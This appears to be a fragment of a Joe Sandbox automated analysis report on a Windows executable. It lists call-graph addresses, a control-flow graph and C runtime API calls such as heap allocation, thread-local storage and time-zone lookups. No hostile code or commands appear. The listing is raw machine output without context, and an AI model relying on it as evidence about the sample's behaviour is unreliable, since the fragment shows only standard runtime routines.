18107->18110 18147 7ff7fbdd6fb8 18107->18147 18108 7ff7fbdc514a __std_exception_copy 18108->17953 18109 7ff7fbdc4250 47 API calls 18109->18110 18110->18108 18110->18109 18113 7ff7fbdc4560 18112->18113 18114 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 18113->18114 18115 7ff7fbdc45c2 18114->18115 18115->17959 18115->17960 18117 7ff7fbdc48e1 18116->18117 18120 7ff7fbdc4884 18116->18120 18118 7ff7fbdc43d0 57 API calls 18117->18118 18122 7ff7fbdc48cc 18120->18122 18205 7ff7fbdc43d0 18120->18205 18148 7ff7fbdd6fe8 18147->18148 18151 7ff7fbdd64b4 18148->18151 18150 7ff7fbdd7018 18150->18107 18152 7ff7fbdd64e5 18151->18152 18153 7ff7fbdd64f7 18151->18153 18155 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18152->18155 18154 7ff7fbdd6541 18153->18154 18157 7ff7fbdd6504 18153->18157 18158 7ff7fbdd655c 18154->18158 18161 7ff7fbdd4900 45 API calls 18154->18161 18156 7ff7fbdd64ea 18155->18156 18159 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 18156->18159 18160 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 18157->18160 18163 7ff7fbdd657e 18158->18163 18172 7ff7fbdd6f40 18158->18172 18171 7ff7fbdd64f5 18159->18171 18160->18171 18161->18158 18164 7ff7fbdd661f 18163->18164 18166 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18163->18166 18165 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18164->18165 18164->18171 18168 7ff7fbdd66ca 18165->18168 18167 7ff7fbdd6614 18166->18167 18169 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 18167->18169 18170 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 18168->18170 18169->18164 18170->18171 18171->18150 18173 7ff7fbdd6f63 18172->18173 18174 7ff7fbdd6f7a 18172->18174 18178 7ff7fbde0948 18173->18178 18176 7ff7fbdd6f68 18174->18176 18183 7ff7fbde0978 18174->18183 18176->18158 18179 7ff7fbddb710 __CxxCallCatchBlock 45 API calls 18178->18179 18180 7ff7fbde0951 18179->18180 18181 7ff7fbdddf44 45 API calls 18180->18181 18182 7ff7fbde096a 18181->18182 18182->18176 18184 7ff7fbdd4f98 45 API calls 18183->18184 18185 7ff7fbde09b1 18184->18185 18188 7ff7fbde09bd 18185->18188 18190 7ff7fbde34b0 18185->18190 18187 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 18188->18187 18191 7ff7fbdd4f98 45 API calls 18190->18191 18206 7ff7fbdc8ae0 57 API calls 18205->18206 18283 7ff7fbddb710 __CxxCallCatchBlock 45 API calls 18282->18283 18284 7ff7fbdda971 18283->18284 18285 7ff7fbddaa9c __CxxCallCatchBlock 45 API calls 18284->18285 18286 7ff7fbdda991 18285->18286 18803 7ff7fbddb590 18804 7ff7fbddb595 18803->18804 18808 7ff7fbddb5aa 18803->18808 18809 7ff7fbddb5b0 18804->18809 18810 7ff7fbddb5f2 18809->18810 18811 7ff7fbddb5fa 18809->18811 18812 7ff7fbddaf0c __free_lconv_num 11 API calls 18810->18812 18813 7ff7fbddaf0c __free_lconv_num 11 API calls 18811->18813 18812->18811 18814 7ff7fbddb607 18813->18814 18815 7ff7fbddaf0c __free_lconv_num 11 API calls 18814->18815 18816 7ff7fbddb614 18815->18816 18817 7ff7fbddaf0c __free_lconv_num 11 API calls 18816->18817 18818 7ff7fbddb621 18817->18818 18819 7ff7fbddaf0c __free_lconv_num 11 API calls 18818->18819 18820 7ff7fbddb62e 18819->18820 18821 7ff7fbddaf0c __free_lconv_num 11 API calls 18820->18821 18822 7ff7fbddb63b 18821->18822 18823 7ff7fbddaf0c __free_lconv_num 11 API calls 18822->18823 18824 7ff7fbddb648 18823->18824 18825 7ff7fbddaf0c __free_lconv_num 11 API calls 18824->18825 18826 7ff7fbddb655 18825->18826 18827 7ff7fbddaf0c __free_lconv_num 11 API calls 18826->18827 18828 7ff7fbddb665 18827->18828 18829 7ff7fbddaf0c __free_lconv_num 11 API calls 18828->18829 18830 7ff7fbddb675 18829->18830 18835 7ff7fbddb458 18830->18835 18849 7ff7fbde0cb8 EnterCriticalSection 18835->18849 18357 7ff7fbdd5310 18358 7ff7fbdd531b 18357->18358 18366 7ff7fbddf764 18358->18366 18379 7ff7fbde0cb8 EnterCriticalSection 18366->18379 18851 7ff7fbdcbf90 18852 7ff7fbdcbfa0 18851->18852 18868 7ff7fbdda138 18852->18868 18854 7ff7fbdcbfac 18874 7ff7fbdcc298 18854->18874 18856 7ff7fbdcc57c 7 API calls 18858 7ff7fbdcc045 18856->18858 18857 7ff7fbdcbfc4 _RTC_Initialize 18866 7ff7fbdcc019 18857->18866 18879 7ff7fbdcc448 18857->18879 18860 7ff7fbdcbfd9 18882 7ff7fbdd95a4 18860->18882 18866->18856 18867 7ff7fbdcc035 18866->18867 18869 7ff7fbdda149 18868->18869 18870 7ff7fbdda151 18869->18870 18871 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18869->18871 18870->18854 18872 7ff7fbdda160 18871->18872 18873 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 18872->18873 18873->18870 18875 7ff7fbdcc2a9 18874->18875 18878 7ff7fbdcc2ae __scrt_acquire_startup_lock 18874->18878 18876 7ff7fbdcc57c 7 API calls 18875->18876 18875->18878 18877 7ff7fbdcc322 18876->18877 18878->18857 18907 7ff7fbdcc40c 18879->18907 18881 7ff7fbdcc451 18881->18860 18883 7ff7fbdd95c4 18882->18883 18905 7ff7fbdcbfe5 18882->18905 18884 7ff7fbdd95e2 GetModuleFileNameW 18883->18884 18885 7ff7fbdd95cc 18883->18885 18889 7ff7fbdd960d 18884->18889 18886 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18885->18886 18887 7ff7fbdd95d1 18886->18887 18888 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 18887->18888 18888->18905 18890 7ff7fbdd9544 11 API calls 18889->18890 18891 7ff7fbdd964d 18890->18891 18892 7ff7fbdd9655 18891->18892 18893 7ff7fbdd966d 18891->18893 18894 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18892->18894 18897 7ff7fbdd968f 18893->18897 18899 7ff7fbdd96d4 18893->18899 18900 7ff7fbdd96bb 18893->18900 18895 7ff7fbdd965a 18894->18895 18896 7ff7fbddaf0c __free_lconv_num 11 API calls 18895->18896 18896->18905 18898 7ff7fbddaf0c __free_lconv_num 11 API calls 18897->18898 18898->18905 18903 7ff7fbddaf0c __free_lconv_num 11 API calls 18899->18903 18901 7ff7fbddaf0c __free_lconv_num 11 API calls 18900->18901 18902 7ff7fbdd96c4 18901->18902 18904 7ff7fbddaf0c __free_lconv_num 11 API calls 18902->18904 18903->18897 18904->18905 18905->18866 18906 7ff7fbdcc51c InitializeSListHead 18905->18906 18908 7ff7fbdcc426 18907->18908 18910 7ff7fbdcc41f 18907->18910 18911 7ff7fbdda77c 18908->18911 18910->18881 18914 7ff7fbdda3b8 18911->18914 18921 7ff7fbde0cb8 EnterCriticalSection 18914->18921 18936 7ff7fbdeab89 18937 7ff7fbdeaba2 18936->18937 18938 7ff7fbdeab98 18936->18938 18940 7ff7fbde0d18 LeaveCriticalSection 18938->18940 18454 7ff7fbddcae0 18465 7ff7fbde0cb8 EnterCriticalSection 18454->18465 18466 7ff7fbdda2e0 18469 7ff7fbdda25c 18466->18469 18476 7ff7fbde0cb8 EnterCriticalSection 18469->18476 18483 7ff7fbdeaaf4 18486 7ff7fbdd5378 LeaveCriticalSection 18483->18486 15184 7ff7fbdcb4f0 15185 7ff7fbdcb513 15184->15185 15186 7ff7fbdcb52f memcpy_s 15184->15186 15188 7ff7fbdddbbc 15185->15188 15189 7ff7fbdddc07 15188->15189 15193 7ff7fbdddbcb _wfindfirst32i64 15188->15193 15198 7ff7fbdd54c4 15189->15198 15190 7ff7fbdddbee HeapAlloc 15192 7ff7fbdddc05 15190->15192 15190->15193 15192->15186 15193->15189 15193->15190 15195 7ff7fbde3c00 15193->15195 15201 7ff7fbde3c40 15195->15201 15207 7ff7fbddb888 GetLastError 15198->15207 15200 7ff7fbdd54cd 15200->15192 15206 7ff7fbde0cb8 EnterCriticalSection 15201->15206 15208 7ff7fbddb8c9 FlsSetValue 15207->15208 15213 7ff7fbddb8ac 15207->15213 15209 7ff7fbddb8b9 SetLastError 15208->15209 15210 7ff7fbddb8db 15208->15210 15209->15200 15224 7ff7fbddf158 15210->15224 15213->15208 15213->15209 15215 7ff7fbddb908 FlsSetValue 15217 7ff7fbddb914 FlsSetValue 15215->15217 15218 7ff7fbddb926 15215->15218 15216 7ff7fbddb8f8 FlsSetValue 15219 7ff7fbddb901 15216->15219 15217->15219 15237 7ff7fbddb4b8 15218->15237 15231 7ff7fbddaf0c 15219->15231 15229 7ff7fbddf169 _wfindfirst32i64 15224->15229 15225 7ff7fbddf1ba 15227 7ff7fbdd54c4 _wfindfirst32i64 10 API calls 15225->15227 15226 7ff7fbddf19e HeapAlloc 15228 7ff7fbddb8ea 15226->15228 15226->15229 15227->15228 15228->15215 15228->15216 15229->15225 15229->15226 15230 7ff7fbde3c00 _wfindfirst32i64 2 API calls 15229->15230 15230->15229 15232 7ff7fbddaf11 RtlFreeHeap 15231->15232 15236 7ff7fbddaf40 15231->15236 15233 7ff7fbddaf2c GetLastError 15232->15233 15232->15236 15234 7ff7fbddaf39 __free_lconv_num 15233->15234 15235 7ff7fbdd54c4 _wfindfirst32i64 9 API calls 15234->15235 15235->15236 15236->15209 15242 7ff7fbddb390 15237->15242 15254 7ff7fbde0cb8 EnterCriticalSection 15242->15254 18494 7ff7fbde84f0 18497 7ff7fbde2c60 18494->18497 18498 7ff7fbde2c6d 18497->18498 18499 7ff7fbde2cb2 18497->18499 18503 7ff7fbddb7e4 18498->18503 18504 7ff7fbddb7f5 FlsGetValue 18503->18504 18505 7ff7fbddb810 FlsSetValue 18503->18505 18506 7ff7fbddb802 18504->18506 18507 7ff7fbddb80a 18504->18507 18505->18506 18508 7ff7fbddb81d 18505->18508 18509 7ff7fbddb808 18506->18509 18510 7ff7fbddaa9c __CxxCallCatchBlock 45 API calls 18506->18510 18507->18505 18511 7ff7fbddf158 _wfindfirst32i64 11 API calls 18508->18511 18523 7ff7fbde2934 18509->18523 18512 7ff7fbddb885 18510->18512 18513 7ff7fbddb82c 18511->18513 18514 7ff7fbddb84a FlsSetValue 18513->18514 18515 7ff7fbddb83a FlsSetValue 18513->18515 18517 7ff7fbddb856 FlsSetValue 18514->18517 18518 7ff7fbddb868 18514->18518 18516 7ff7fbddb843 18515->18516 18519 7ff7fbddaf0c __free_lconv_num 11 API calls 18516->18519 18517->18516 18520 7ff7fbddb4b8 _wfindfirst32i64 11 API calls 18518->18520 18519->18506 18521 7ff7fbddb870 18520->18521 18522 7ff7fbddaf0c __free_lconv_num 11 API calls 18521->18522 18522->18509 18546 7ff7fbde2ba4 18523->18546 18525 7ff7fbde2969 18561 7ff7fbde2634 18525->18561 18528 7ff7fbde2986 18528->18499 18529 7ff7fbdddbbc _fread_nolock 12 API calls 18530 7ff7fbde2997 18529->18530 18531 7ff7fbde299f 18530->18531 18533 7ff7fbde29ae 18530->18533 18532 7ff7fbddaf0c __free_lconv_num 11 API calls 18531->18532 18532->18528 18533->18533 18568 7ff7fbde2cdc 18533->18568 18536 7ff7fbde2aaa 18537 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 18536->18537 18539 7ff7fbde2aaf 18537->18539 18538 7ff7fbde2b05 18541 7ff7fbde2b6c 18538->18541 18579 7ff7fbde2464 18538->18579 18542 7ff7fbddaf0c __free_lconv_num 11 API calls 18539->18542 18540 7ff7fbde2ac4 18540->18538 18543 7ff7fbddaf0c __free_lconv_num 11 API calls 18540->18543 18545 7ff7fbddaf0c __free_lconv_num 11 API calls 18541->18545 18542->18528 18543->18538 18545->18528 18547 7ff7fbde2bc7 18546->18547 18548 7ff7fbde2bd1 18547->18548 18594 7ff7fbde0cb8 EnterCriticalSection 18547->18594 18550 7ff7fbde2c43 18548->18550 18553 7ff7fbddaa9c __CxxCallCatchBlock 45 API calls 18548->18553 18550->18525 18554 7ff7fbde2c5b 18553->18554 18557 7ff7fbddb7e4 50 API calls 18554->18557 18560 7ff7fbde2cb2 18554->18560 18558 7ff7fbde2c9c 18557->18558 18559 7ff7fbde2934 65 API calls 18558->18559 18559->18560 18560->18525 18562 7ff7fbdd4f98 45 API calls 18561->18562 18563 7ff7fbde2648 18562->18563 18564 7ff7fbde2654 GetOEMCP 18563->18564 18565 7ff7fbde2666 18563->18565 18567 7ff7fbde267b 18564->18567 18566 7ff7fbde266b GetACP 18565->18566 18565->18567 18566->18567 18567->18528 18567->18529 18569 7ff7fbde2634 47 API calls 18568->18569 18570 7ff7fbde2d09 18569->18570 18571 7ff7fbde2e5f 18570->18571 18573 7ff7fbde2d46 IsValidCodePage 18570->18573 18578 7ff7fbde2d60 memcpy_s 18570->18578 18572 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 18571->18572 18574 7ff7fbde2aa1 18572->18574 18573->18571 18575 7ff7fbde2d57 18573->18575 18574->18536 18574->18540 18576 7ff7fbde2d86 GetCPInfo 18575->18576 18575->18578 18576->18571 18576->18578 18595 7ff7fbde274c 18578->18595 18651 7ff7fbde0cb8 EnterCriticalSection 18579->18651 18596 7ff7fbde2789 GetCPInfo 18595->18596 18605 7ff7fbde287f 18595->18605 18599 7ff7fbde279c 18596->18599 18596->18605 18597 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 18598 7ff7fbde291e 18597->18598 18598->18571 18600 7ff7fbde34b0 48 API calls 18599->18600 18601 7ff7fbde2813 18600->18601 18606 7ff7fbde8454 18601->18606 18604 7ff7fbde8454 54 API calls 18604->18605 18605->18597 18607 7ff7fbdd4f98 45 API calls 18606->18607 18608 7ff7fbde8479 18607->18608 18611 7ff7fbde8120 18608->18611 18612 7ff7fbde8161 18611->18612 18613 7ff7fbddfc00 _fread_nolock MultiByteToWideChar 18612->18613 18616 7ff7fbde81ab 18613->18616 18614 7ff7fbde8429 18615 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 18614->18615 18617 7ff7fbde2846 18615->18617 18616->18614 18618 7ff7fbdddbbc _fread_nolock 12 API calls 18616->18618 18620 7ff7fbde81e3 18616->18620 18641 7ff7fbde82e1 18616->18641 18617->18604 18618->18620 18619 7ff7fbddaf0c __free_lconv_num 11 API calls 18619->18614 18621 7ff7fbddfc00 _fread_nolock MultiByteToWideChar 18620->18621 18620->18641 18622 7ff7fbde8256 18621->18622 18622->18641 18642 7ff7fbddf5a4 18622->18642 18625 7ff7fbde82a1 18628 7ff7fbddf5a4 __crtLCMapStringW 6 API calls 18625->18628 18625->18641 18626 7ff7fbde82f2 18627 7ff7fbde8310 18626->18627 18629 7ff7fbdddbbc _fread_nolock 12 API calls 18626->18629 18630 7ff7fbde83c4 18626->18630 18632 7ff7fbddf5a4 __crtLCMapStringW 6 API calls 18627->18632 18627->18641 18628->18641 18629->18627 18631 7ff7fbddaf0c __free_lconv_num 11 API calls 18630->18631 18630->18641 18631->18641 18633 7ff7fbde8390 18632->18633 18633->18630 18634 7ff7fbde83c6 18633->18634 18635 7ff7fbde83b0 18633->18635 18637 7ff7fbde04c8 WideCharToMultiByte 18634->18637 18636 7ff7fbde04c8 WideCharToMultiByte 18635->18636 18638 7ff7fbde83be 18636->18638 18637->18638 18638->18630 18639 7ff7fbde83de 18638->18639 18640 7ff7fbddaf0c __free_lconv_num 11 API calls 18639->18640 18639->18641 18640->18641 18641->18614 18641->18619 18643 7ff7fbddf1d0 __crtLCMapStringW 5 API calls 18642->18643 18644 7ff7fbddf5e2 18643->18644 18645 7ff7fbddf5ea 18644->18645 18648 7ff7fbddf690 18644->18648 18645->18625 18645->18626 18645->18641 18647 7ff7fbddf653 LCMapStringW 18647->18645 18649 7ff7fbddf1d0 __crtLCMapStringW 5 API calls 18648->18649 18650 7ff7fbddf6be __crtLCMapStringW 18649->18650 18650->18647 15256 7ff7fbddfcec 15257 7ff7fbddfede 15256->15257 15259 7ff7fbddfd2e _isindst 15256->15259 15258 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 15257->15258 15276 7ff7fbddfece 15258->15276 15259->15257 15262 7ff7fbddfdae _isindst 15259->15262 15277 7ff7fbde6904 15262->15277 15267 7ff7fbddff0a 15317 7ff7fbddaec4 IsProcessorFeaturePresent 15267->15317 15274 7ff7fbddfe0b 15274->15276 15301 7ff7fbde6948 15274->15301 15308 7ff7fbdcbcc0 15276->15308 15278 7ff7fbde6913 15277->15278 15279 7ff7fbddfdcc 15277->15279 15321 7ff7fbde0cb8 EnterCriticalSection 15278->15321 15283 7ff7fbde5d08 15279->15283 15284 7ff7fbde5d11 15283->15284 15285 7ff7fbddfde1 15283->15285 15286 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 15284->15286 15285->15267 15289 7ff7fbde5d38 15285->15289 15287 7ff7fbde5d16 15286->15287 15322 7ff7fbddaea4 15287->15322 15290 7ff7fbde5d41 15289->15290 15292 7ff7fbddfdf2 15289->15292 15291 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 15290->15291 15293 7ff7fbde5d46 15291->15293 15292->15267 15295 7ff7fbde5d68 15292->15295 15294 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 15293->15294 15294->15292 15296 7ff7fbde5d71 15295->15296 15298 7ff7fbddfe03 15295->15298 15297 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 15296->15297 15299 7ff7fbde5d76 15297->15299 15298->15267 15298->15274 15300 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 15299->15300 15300->15298 15362 7ff7fbde0cb8 EnterCriticalSection 15301->15362 15309 7ff7fbdcbcc9 15308->15309 15310 7ff7fbdcbcd4 15309->15310 15311 7ff7fbdcbd20 IsProcessorFeaturePresent 15309->15311 15312 7ff7fbdcbd38 15311->15312 15363 7ff7fbdcbf14 RtlCaptureContext 15312->15363 15318 7ff7fbddaed7 15317->15318 15368 7ff7fbddabd8 15318->15368 15324 7ff7fbddad3c 15322->15324 15325 7ff7fbddad67 15324->15325 15328 7ff7fbddadd8 15325->15328 15327 7ff7fbddad8e 15336 7ff7fbddab20 15328->15336 15331 7ff7fbddae13 15331->15327 15334 7ff7fbddaec4 _wfindfirst32i64 17 API calls 15335 7ff7fbddaea3 15334->15335 15337 7ff7fbddab3c GetLastError 15336->15337 15338 7ff7fbddab77 15336->15338 15339 7ff7fbddab4c 15337->15339 15338->15331 15342 7ff7fbddab8c 15338->15342 15345 7ff7fbddb950 15339->15345 15343 7ff7fbddabc0 15342->15343 15344 7ff7fbddaba8 GetLastError SetLastError 15342->15344 15343->15331 15343->15334 15344->15343 15346 7ff7fbddb96f FlsGetValue 15345->15346 15347 7ff7fbddb98a FlsSetValue 15345->15347 15348 7ff7fbddb984 15346->15348 15359 7ff7fbddab67 SetLastError 15346->15359 15349 7ff7fbddb997 15347->15349 15347->15359 15348->15347 15350 7ff7fbddf158 _wfindfirst32i64 11 API calls 15349->15350 15351 7ff7fbddb9a6 15350->15351 15352 7ff7fbddb9c4 FlsSetValue 15351->15352 15353 7ff7fbddb9b4 FlsSetValue 15351->15353 15355 7ff7fbddb9d0 FlsSetValue 15352->15355 15356 7ff7fbddb9e2 15352->15356 15354 7ff7fbddb9bd 15353->15354 15357 7ff7fbddaf0c __free_lconv_num 11 API calls 15354->15357 15355->15354 15358 7ff7fbddb4b8 _wfindfirst32i64 11 API calls 15356->15358 15357->15359 15360 7ff7fbddb9ea 15358->15360 15359->15338 15361 7ff7fbddaf0c __free_lconv_num 11 API calls 15360->15361 15361->15359 15364 7ff7fbdcbf2e RtlLookupFunctionEntry 15363->15364 15365 7ff7fbdcbf44 RtlVirtualUnwind 15364->15365 15366 7ff7fbdcbd4b 15364->15366 15365->15364 15365->15366 15367 7ff7fbdcbce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15366->15367 15369 7ff7fbddac12 _wfindfirst32i64 memcpy_s 15368->15369 15370 7ff7fbddac3a RtlCaptureContext RtlLookupFunctionEntry 15369->15370 15371 7ff7fbddac74 RtlVirtualUnwind 15370->15371 15372 7ff7fbddacaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15370->15372 15371->15372 15374 7ff7fbddacfc _wfindfirst32i64 15372->15374 15373 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15375 7ff7fbddad1b GetCurrentProcess TerminateProcess 15373->15375 15374->15373 19059 7ff7fbdea96e 19060 7ff7fbdea97e 19059->19060 19063 7ff7fbdd5378 LeaveCriticalSection 19060->19063 19637 7ff7fbde1d20 19648 7ff7fbde7cb4 19637->19648 19649 7ff7fbde7cc1 19648->19649 19650 7ff7fbddaf0c __free_lconv_num 11 API calls 19649->19650 19651 7ff7fbde7cdd 19649->19651 19650->19649 19652 7ff7fbddaf0c __free_lconv_num 11 API calls 19651->19652 19653 7ff7fbde1d29 19651->19653 19652->19651 19654 7ff7fbde0cb8 EnterCriticalSection 19653->19654

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 133 7ff7fbde6370-7ff7fbde63ab call 7ff7fbde5cf8 call 7ff7fbde5d00 call 7ff7fbde5d68 140 7ff7fbde65d5-7ff7fbde6621 call 7ff7fbddaec4 call 7ff7fbde5cf8 call 7ff7fbde5d00 call 7ff7fbde5d68 133->140 141 7ff7fbde63b1-7ff7fbde63bc call 7ff7fbde5d08 133->141 168 7ff7fbde675f-7ff7fbde67cd call 7ff7fbddaec4 call 7ff7fbde1be8 140->168 169 7ff7fbde6627-7ff7fbde6632 call 7ff7fbde5d08 140->169 141->140 146 7ff7fbde63c2-7ff7fbde63cc 141->146 148 7ff7fbde63ee-7ff7fbde63f2 146->148 149 7ff7fbde63ce-7ff7fbde63d1 146->149 152 7ff7fbde63f5-7ff7fbde63fd 148->152 151 7ff7fbde63d4-7ff7fbde63df 149->151 154 7ff7fbde63e1-7ff7fbde63e8 151->154 155 7ff7fbde63ea-7ff7fbde63ec 151->155 152->152 156 7ff7fbde63ff-7ff7fbde6412 call 7ff7fbdddbbc 152->156 154->151 154->155 155->148 158 7ff7fbde641b-7ff7fbde6429 155->158 163 7ff7fbde6414-7ff7fbde6416 call 7ff7fbddaf0c 156->163 164 7ff7fbde642a-7ff7fbde6436 call 7ff7fbddaf0c 156->164 163->158 174 7ff7fbde643d-7ff7fbde6445 164->174 187 7ff7fbde67cf-7ff7fbde67d6 168->187 188 7ff7fbde67db-7ff7fbde67de 168->188 169->168 176 7ff7fbde6638-7ff7fbde6643 call 7ff7fbde5d38 169->176 174->174 177 7ff7fbde6447-7ff7fbde6458 call 7ff7fbde0e54 174->177 176->168 185 7ff7fbde6649-7ff7fbde666c call 7ff7fbddaf0c GetTimeZoneInformation 176->185 177->140 186 7ff7fbde645e-7ff7fbde64b4 call 7ff7fbdcd0e0 * 4 call 7ff7fbde628c 177->186 202 7ff7fbde6734-7ff7fbde675e call 7ff7fbde5cf0 call 7ff7fbde5ce0 call 7ff7fbde5ce8 185->202 203 7ff7fbde6672-7ff7fbde6693 185->203 245 7ff7fbde64b6-7ff7fbde64ba 186->245 193 7ff7fbde686b-7ff7fbde686e 187->193 189 7ff7fbde6815-7ff7fbde6828 call 7ff7fbdddbbc 188->189 190 7ff7fbde67e0 188->190 212 7ff7fbde6833-7ff7fbde684e call 7ff7fbde1be8 189->212 213 7ff7fbde682a 189->213 194 7ff7fbde67e3 190->194 193->194 198 7ff7fbde6874-7ff7fbde687c call 7ff7fbde6370 193->198 200 7ff7fbde67e8-7ff7fbde6814 call 7ff7fbddaf0c call 7ff7fbdcbcc0 194->200 201 7ff7fbde67e3 call 7ff7fbde65ec 194->201 198->200 201->200 207 7ff7fbde6695-7ff7fbde669b 203->207 208 7ff7fbde669e-7ff7fbde66a5 203->208 207->208 215 7ff7fbde66a7-7ff7fbde66af 208->215 216 7ff7fbde66b9 208->216 228 7ff7fbde6855-7ff7fbde6867 call 7ff7fbddaf0c 212->228 229 7ff7fbde6850-7ff7fbde6853 212->229 220 7ff7fbde682c-7ff7fbde6831 call 7ff7fbddaf0c 213->220 215->216 222 7ff7fbde66b1-7ff7fbde66b7 215->222 225 7ff7fbde66bb-7ff7fbde672f call 7ff7fbdcd0e0 * 4 call 7ff7fbde31cc call 7ff7fbde6884 * 2 216->225 220->190 222->225 225->202 228->193 229->220 247 7ff7fbde64c0-7ff7fbde64c4 245->247 248 7ff7fbde64bc 245->248 247->245 250 7ff7fbde64c6-7ff7fbde64eb call 7ff7fbdd706c 247->250 248->247 256 7ff7fbde64ee-7ff7fbde64f2 250->256 258 7ff7fbde64f4-7ff7fbde64ff 256->258 259 7ff7fbde6501-7ff7fbde6505 256->259 258->259 261 7ff7fbde6507-7ff7fbde650b 258->261 259->256 264 7ff7fbde658c-7ff7fbde6590 261->264 265 7ff7fbde650d-7ff7fbde6535 call 7ff7fbdd706c 261->265 266 7ff7fbde6592-7ff7fbde6594 264->266 267 7ff7fbde6597-7ff7fbde65a4 264->267 273 7ff7fbde6553-7ff7fbde6557 265->273 274 7ff7fbde6537 265->274 266->267 269 7ff7fbde65a6-7ff7fbde65bc call 7ff7fbde628c 267->269 270 7ff7fbde65bf-7ff7fbde65ce call 7ff7fbde5cf0 call 7ff7fbde5ce0 267->270 269->270 270->140 273->264 277 7ff7fbde6559-7ff7fbde6577 call 7ff7fbdd706c 273->277 279 7ff7fbde653a-7ff7fbde6541 274->279 285 7ff7fbde6583-7ff7fbde658a 277->285 279->273 280 7ff7fbde6543-7ff7fbde6551 279->280 280->273 280->279 285->264 286 7ff7fbde6579-7ff7fbde657d 285->286 286->264 287 7ff7fbde657f 286->287 287->285
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE63B5
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDE5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDE5D1C
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF22
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAF0C: GetLastError.KERNEL32(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF2C
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FBDDAEA3,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDAECD
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7FBDDAEA3,?,?,?,?,?,00007FF7FBDD30CC), ref: 00007FF7FBDDAEF2
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE63A4
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDE5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDE5D7C
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE661A
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE662B
                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF7FBDE663C
                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FBDE687C), ref: 00007FF7FBDE6663
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
